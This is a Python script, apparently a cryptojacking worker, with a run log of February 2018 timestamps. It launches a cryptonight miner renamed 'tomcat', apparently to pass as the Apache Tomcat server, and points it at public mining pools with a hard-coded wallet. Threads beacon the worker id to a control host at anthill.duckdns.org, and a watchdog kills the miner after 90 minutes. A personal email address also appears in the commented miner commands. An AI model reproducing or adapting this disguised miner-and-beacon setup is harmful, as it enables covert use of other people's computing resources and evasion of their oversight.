import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:03.729846
#2018-02-17 16:45:03.731704
#2018-02-17 18:32:01.840191
#2018-02-17 20:20:05.819954
#2018-02-17 22:07:05.115822
#2018-02-17 23:51:01.288686
#2018-02-18 01:41:03.960946
#2018-02-18 03:27:06.362031
#2018-02-18 05:15:03.923752
#2018-02-18 07:07:06.833652
#2018-02-18 08:55:05.057591
#2018-02-18 10:42:05.810747
#2018-02-18 12:27:02.056678
#2018-02-18 14:15:01.661698
#2018-02-18 16:04:07.647175
#2018-02-18 17:53:07.058155
#2018-02-18 19:40:01.252149
#2018-02-18 21:25:01.442812
#2018-02-18 23:14:03.400580
#2018-02-19 01:01:07.735708
#2018-02-19 02:49:06.263042
#2018-02-19 04:37:07.166123
#2018-02-19 06:21:06.596869
#2018-02-19 08:09:05.536165
#2018-02-19 09:59:07.220755
#2018-02-19 11:48:08.809723
#2018-02-19 13:36:01.665241
#2018-02-19 15:23:08.475338
#2018-02-19 17:11:01.798062
#2018-02-19 18:57:09.007574
#2018-02-19 20:45:09.295492
#2018-02-19 22:32:06.044520
#2018-02-20 00:18:03.633516
#2018-02-20 02:05:08.281370
#2018-02-20 03:55:06.241539
#2018-02-20 05:41:05.916121
#2018-02-20 07:27:04.650296
#2018-02-20 09:11:03.949424
#2018-02-20 10:54:01.350259
#2018-02-20 12:42:01.731610
#2018-02-20 14:26:08.378334
#2018-02-20 16:10:03.799788
#2018-02-20 17:55:11.512929
#2018-02-20 19:47:01.699995
#2018-02-20 21:36:05.667761
#2018-02-20 23:18:04.880951
#2018-02-21 01:04:05.353973
#2018-02-21 02:50:06.248908
#2018-02-21 04:37:07.167883
#2018-02-21 06:25:07.403428
#2018-02-21 08:12:01.900919
#2018-02-21 09:58:08.481717
#2018-02-21 11:47:07.985853
#2018-02-21 13:38:05.526053
#2018-02-21 15:22:06.435573
#2018-02-21 17:12:01.771644
#2018-02-21 18:59:05.004190
#2018-02-21 20:48:05.997288
#2018-02-21 22:32:07.521264
#2018-02-22 00:22:05.261036
#2018-02-22 02:10:09.423266
#2018-02-22 03:57:05.911790
#2018-02-22 05:44:01.668462
#2018-02-22 07:29:05.834547
#2018-02-22 09:17:07.090084
#2018-02-22 11:04:04.776505
#2018-02-22 12:54:09.060952
#2018-02-22 14:42:07.255830
#2018-02-22 16:28:05.952044
#2018-02-22 18:14:09.127480
#2018-02-22 20:06:05.236998
#2018-02-22 21:53:07.803825
#2018-02-22 23:42:01.369885
#2018-02-23 01:29:06.785362
#2018-02-23 03:17:02.063510
#2018-02-23 05:03:01.565211
#2018-02-23 06:49:05.077244
#2018-02-23 08:39:07.770119
#2018-02-23 10:54:01.316408
#2018-02-23 12:51:04.939971
#2018-02-23 14:36:05.233905
#2018-02-23 16:26:01.554082
#2018-02-23 18:12:06.159195
#2018-02-23 19:57:06.254273
#2018-02-23 21:42:04.212292
#2018-02-23 23:34:04.036716
#2018-02-24 01:23:04.628166
#2018-02-24 03:13:07.447498
#2018-02-24 04:58:07.402350
#2018-02-24 06:48:05.933749
#2018-02-24 08:40:01.363465
#2018-02-24 10:24:05.284997
#2018-02-24 12:19:06.170840
#2018-02-24 14:12:01.705211
#2018-02-24 15:58:05.705766
#2018-02-24 17:49:04.148928
#2018-02-24 19:37:04.879538
#2018-02-24 21:25:01.402593
#2018-02-25 00:06:05.221214
#2018-02-25 03:19:05.093626
#2018-02-25 07:05:07.261880